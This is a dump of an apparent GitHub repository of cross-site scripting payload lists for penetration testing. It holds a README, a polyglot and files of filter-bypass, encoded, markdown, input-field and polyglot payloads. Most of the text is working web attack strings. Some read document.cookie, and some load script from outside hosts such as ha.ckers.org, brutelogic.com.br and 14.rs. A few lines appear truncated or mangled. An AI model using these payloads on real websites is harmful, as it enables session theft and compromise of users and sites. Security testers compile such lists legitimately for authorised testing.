├── .github └── FUNDING.yml ├── README.md ├── swagger ├── sciprt.js └── test.yaml ├── xss-all-list.txt ├── xss-by-keyword-filtering.txt ├── xss-encoding-payload.txt ├── xss-for-hidden-input.txt ├── xss-for-input.txt ├── xss-for-markdowns.txt ├── xss-for-onfocus.txt ├── xss-for-title.txt ├── xss-for-username-field.txt ├── xss-for-vuejs.txt ├── xss-href.txt ├── xss-payload-for-input-search.txt ├── xss-polyglot.txt ├── xss-top500-list.txt ├── xss-without-alert-confirm-prompt └── xss-without-alert.txt /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | patreon: proviesec 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # xss-payload-list 2 | [![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT) 3 | [![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/Proviesec/xss-payload-list/issues) 4 |

5 | 6 |

7 | 8 | [![Twitter](https://img.shields.io/twitter/follow/proviesec?label=Follow)](https://twitter.com/proviesec) 9 |

10 | 11 | # Introduction 12 | 13 | :star: Star us on GitHub — it motivates a lot! :star: 14 | 15 | If you have any XSS payload, just create a PullRequest. 16 | 17 | # Write-Ups / Tutorials 18 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 19 | https://medium.com/p/92ac1180e0d0 20 | https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting 21 | 22 | # My love polyglot 23 | ``` 24 | jaVasCript:/*--> 57 | 58 | 2: injecting HTML Entities 59 | 60 | <b> 61 | \u003b\u00 62 | 63 | 3 :injecting Script Tag 64 | 65 | 4: Testing For Recursive Filters 66 | 67 | 5: injecting Anchor Tag 68 | 69 | 6: Testing For Event Handlers 70 | 71 | 7: Input Less Common Event Handlers 72 | 73 | 8: Testing With SRC Attrubute 74 | 75 | 9: Testing With Action Attrubute 76 | 77 | 10: Injecting HTML 5 Based Payload 78 | 79 | 80 | 81 | ## Reports 82 | 83 | - https://hackerone.com/reports/1342009 84 | - https://hackerone.com/reports/1416672 85 | - https://hackerone.com/reports/1527284 86 | - https://hackerone.com/reports/1683129 87 | - https://hackerone.com/reports/834071 88 | 89 | # Disclaimer: DONT BE A JERK! 90 | Needless to mention, please use this tool very very carefully. The authors won't be responsible for any consequences. 91 | 92 | -------------------------------------------------------------------------------- /swagger/sciprt.js: -------------------------------------------------------------------------------- 1 | alert(document.cookie); 2 | -------------------------------------------------------------------------------- /xss-by-keyword-filtering.txt: -------------------------------------------------------------------------------- 1 | (alert)(1) 2 | globalThis[`al`+/ert/.source]`1` 3 | [alert][0].call(this,1) 4 | window['a'+'l'+'e'+'r'+'t']() 5 | window['a'+'l'+'e'+'r'+'t'].call(this,1) 6 | top['a'+'l'+'e'+'r'+'t'].apply(this,[1]) 7 | x=alert,x(1) 8 | [1].find(alert) 9 | top[8680439..toString(30)](1) 10 | top['al\x65rt'](1) 11 | top['al\145rt'](1) 12 | al\u0065rt(1) 13 | al\u0065rt`1` 14 | top[/al/.source+/ert/.source](1) 15 | top["al"+"ert"](1) 16 | -------------------------------------------------------------------------------- /xss-encoding-payload.txt: -------------------------------------------------------------------------------- 1 | \u{0000000061}lert(1) 2 | \u{61}lert(1) 3 | \u0061lert(1) 4 | alert(1) 5 | alert(1) 6 | x="",alert(1)//"; 7 | eval('\x61lert(1)') 8 | \u0061\u006c\u0065\u0072\u0074(1) 9 | javascript:'%3Cscript%3Ealert(1)%3C%2Fscript%3E' 10 | %253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E 11 | %2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E 12 | javascript:x='%27-alert(1)-%27'; 13 | %3Cscript%3Ealert(1)%3C/script%3E##1 14 | -------------------------------------------------------------------------------- /xss-for-hidden-input.txt: -------------------------------------------------------------------------------- 1 | y" popover id=x onbeforetoggle=alert(1)> 2 | 3 | -------------------------------------------------------------------------------- /xss-for-input.txt: -------------------------------------------------------------------------------- 1 | "/> 2 | "/> 3 | "/> 4 | "/> 5 | "/> 6 | "/> 7 | "/> 8 | "/> 9 | "/> 10 | -------------------------------------------------------------------------------- /xss-for-markdowns.txt: -------------------------------------------------------------------------------- 1 | [a](javascript:prompt(document.cookie)) 2 | [a](j a v a s c r i p t:prompt(document.cookie)) 3 | ![a](javascript:prompt(document.cookie))\ 4 | 5 | <javascript:alert('XSS')> 6 | ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\ 7 | [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) 8 | [a](javascript:alert('XSS')) 9 | ![a'"`onerror=prompt(document.cookie)](x)\ 10 | [citelol]: (javascript:prompt(document.cookie)) 11 | [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) 12 | [test](javascript://%0d%0aprompt(1)) 13 | [test](javascript://%0d%0aprompt(1);com) 14 | [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) 15 | [notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) 16 | [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) 17 | [clickme](vbscript:alert(document.domain)) 18 | _http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// 19 | > 20 | [text](http://danlec.com " [@danlec](/danlec) ") 21 | [a](javascript:this;alert(1)) 22 | [a](javascript:this;alert(1)) 23 | [a](javascript:this;alert(1)) 24 | [a](Javascript:alert(1)) 25 | [a](Javas%26%2399;ript:alert(1)) 26 | [a](javascript:alert(1)) 27 | [a](javascript:confirm(1) 28 | [a](javascript://www.google.com%0Aprompt(1)) 29 | [a](javascript://%0d%0aconfirm(1);com) 30 | [a](javascript:window.onerror=confirm;throw%201) 31 | [a](javascript:alert(document.domain)) 32 | [a](javascript://www.google.com%0Aalert(1)) 33 | [a]('javascript:alert("1")') 34 | [a](JaVaScRiPt:alert(1)) 35 | ![a](https://www.google.com/image.png"onload="alert(1)) 36 | ![a]("onerror="alert(1)) 37 | <\h1\>confirm(2) 38 | [XSS](.alert(1);) 39 | [ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]]) 40 | [ ](http://a?p=[[/onclick=alert(0) .]]) 41 | -------------------------------------------------------------------------------- /xss-for-onfocus.txt: -------------------------------------------------------------------------------- 1 | alert(1)// 2 | %22write('')%22 3 | alert;throw 1 4 | javascript:javascript:alert(1) 5 | alert(document.domain) 6 | -------------------------------------------------------------------------------- /xss-for-title.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 |

alert(1)// 58 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/*/alert()/* 64 | javascript://
*/alert()/* 66 | javascript:"/*'/*`/*--> 67 | -->"/*/alert()/* 68 | /*/alert()/* 69 | javascript://-->
76 | "'`>ABC
DEF 77 | "'`>ABC
DEF 78 | "/> 79 | "/> 80 | "/> 81 | "/> 82 | "/> 83 | "/> 84 | "/> 85 | "/> 86 | "/> 87 | ">”>’> 88 | "> 89 | "><img src="x:x" onerror="alert(XSS)"> 90 | ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 91 | "`'><script>-javascript:alert(1)</script> 92 | "`'><script>\x00javascript:alert(1)</script> 93 | "`'><script>\x09javascript:alert(1)</script> 94 | "`'><script>\x0Ajavascript:alert(1)</script> 95 | "`'><script>\x0Bjavascript:alert(1)</script> 96 | "`'><script>\x0Cjavascript:alert(1)</script> 97 | "`'><script>\x0Djavascript:alert(1)</script> 98 | "`'><script>\x20javascript:alert(1)</script> 99 | "`'><script>\x21javascript:alert(1)</script> 100 | "`'><script>\x2Bjavascript:alert(1)</script> 101 | "`'><script>\x3Bjavascript:alert(1)</script> 102 | "`'><script>\x7Ejavascript:alert(1)</script> 103 | "`'><script>\xC2\x85javascript:alert(1)</script> 104 | "`'><script>\xC2\xA0javascript:alert(1)</script> 105 | "`'><script>\xE1\x9A\x80javascript:alert(1)</script> 106 | "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> 107 | "`'><script>\xE2\x80\x80javascript:alert(1)</script> 108 | "`'><script>\xE2\x80\x81javascript:alert(1)</script> 109 | "`'><script>\xE2\x80\x82javascript:alert(1)</script> 110 | "`'><script>\xE2\x80\x83javascript:alert(1)</script> 111 | "`'><script>\xE2\x80\x84javascript:alert(1)</script> 112 | "`'><script>\xE2\x80\x85javascript:alert(1)</script> 113 | "`'><script>\xE2\x80\x86javascript:alert(1)</script> 114 | "`'><script>\xE2\x80\x87javascript:alert(1)</script> 115 | "`'><script>\xE2\x80\x88javascript:alert(1)</script> 116 | "`'><script>\xE2\x80\x89javascript:alert(1)</script> 117 | "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> 118 | "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> 119 | "`'><script>\xE2\x80\xA8javascript:alert(1)</script> 120 | "`'><script>\xE2\x80\xA9javascript:alert(1)</script> 121 | "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> 122 | "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> 123 | "`'><script>\xE3\x80\x80javascript:alert(1)</script> 124 | "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> 125 | "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> 126 | "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> 127 | "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> 128 | %0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">` 129 | '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 130 | '"`><script>/* *\x2Fjavascript:alert(1)// */</script> 131 | ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> 132 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 133 | '`"><\x00script>javascript:alert(1)</script> 134 | '`"><\x3Cscript>javascript:alert(1)</script> 135 | +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 136 | -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``> 137 | -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> 138 | --> <img src=xxx:x onerror=javascript:alert(1)> --> 139 | --> 140 | --> 141 | --> 142 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 143 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 144 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 145 | 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> 146 | 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> 147 | 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 148 | <! foo="><script>javascript:alert(1)</script>"> 149 | <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> 150 | <img src=x onerror=javascript:alert(1)//"> 151 |  152 |  153 |  154 | -------------------------------------------------------------------------------- /xss-top500-list.txt: -------------------------------------------------------------------------------- 1 | <IMG SRC="javascript:alert('XSS');"> 2 | perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out 3 | <IMG SRC="  javascript:alert('XSS');"> 4 | <SCRIPT/XSS SRC="http://google.com"></SCRIPT> 5 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> 6 | <SCRIPT/SRC="http://google.com"></SCRIPT> 7 | <<SCRIPT>alert("XSS");//<</SCRIPT> 8 | <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > 9 | <SCRIPT SRC=//ha.ckers.org/.j> 10 | <IMG SRC="javascript:alert('XSS')" 11 | <iframe src=http://google.com < 12 | \";alert('XSS');// 13 | </TITLE><SCRIPT>alert("XSS");</SCRIPT> 14 | <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> 15 | <BODY BACKGROUND="javascript:alert('XSS')"> 16 | <IMG DYNSRC="javascript:alert('XSS')"> 17 | <IMG LOWSRC="javascript:alert('XSS')"> 18 | <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> 19 | <IMG SRC='vbscript:msgbox("XSS")'> 20 | <IMG SRC="livescript:[code]"> 21 | <BODY ONLOAD=alert('XSS')> 22 | <BGSOUND SRC="javascript:alert('XSS');"> 23 | <A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z 24 | <d3"<"/onclick="1>[confirm``]"<">z 25 | <d3/onmouseenter=[2].find(confirm)>z 26 | <details open ontoggle=confirm()> 27 | <script y="><">/*<script* */prompt()</script 28 | <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z 29 | <a href="javascript%26colon;alert(1)">click 30 | <a href=javascript:alert(1)>click 31 | <script/"<a"/src=data:=".<a,[8].some(confirm)> 32 | <svg/x=">"/onload=confirm()// 33 | <--`<img/src=` onerror=confirm``> --!> 34 | <svg%0Aonload=%09((pro\u006dpt))()// 35 | <sCript x>(((confirm)))``</scRipt x> 36 | <svg </onload ="1> (_=prompt,_(1)) ""> 37 | </Script><Image SrcSet=K */; OnError=confirm`1` //> 41 | <iframe/src \/\/onload = prompt(1) 42 | <x oncut=alert()>x 43 | <svg onload=write()> 44 | ";a=prompt,a()// 45 | "><iframe%20src="http://google.com"%%203E 46 | "><img src=1 onerror=alert(1)>.gif 47 | "><img src=x onerror=prompt(1);> 48 | "><img src=x onerror=window.open('https://www.google.com/');> 49 | "><link rel=import href=data:text/html,<script>alert(1)</script> 50 | "><script src=//brutelogic.com.br/1.js&num; 51 | "><script src=data:,alert(1)// 52 | "><svg onload=alert(1)// 53 | `<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a()%20x>` 54 | -------------------------------------------------------------------------------- /xss-without-alert-confirm-prompt: -------------------------------------------------------------------------------- 1 | <sVg oNloaD=write()> 2 | <scRipT src=//14.rs> 16 | <sCriPt/src=//14.rs? 17 | <sCRIpt x=">" src=//15.rs></script> 18 | <D3/OnMouSEenTer=[2].find(confirm)>z 19 | <D3"<"/OncLick="1>[confirm``]"<">z 20 | <D3/OnpOinTeReENter=confirm``>click here 21 | <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> 22 | <svg><script>//&NewLine;confirm(1);</script </svg> 23 | '''"'-function(){{{callback}}}()-">\"><scrIpt>{callback}</scrIpt><aUdio src=x oNerror={callback}><"-'-function(){{{callback}}}()"''' 24 | ";a=prompt,a()// 25 | "><img src=x onerror=prompt(1);> 26 | /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> 27 | exp/*<XSS STYLE='no\xss:noxss("*//*"); 28 | <x style="background:url('x;color:red;/*')">XXX</x> 29 | <x style="behavior:url(%(sct)s)"> 30 | <a href=[]" onmouseover=prompt(1)//">XYZ</a 31 | <a id="x"><rect fill="white" width="1000" height="1000"/></a> 32 | javascript:confirm(1) 33 | javascript\x0A:javascript:confirm(1) 34 | \x1Cjavascript:javascript:confirm(1) 35 | \xE2\x81\x9Fjavascript:javascript:confirm(1) 36 | \xE2\x80\x85javascript:javascript:confirm(1) 37 | --------------------------------------------------------------------------------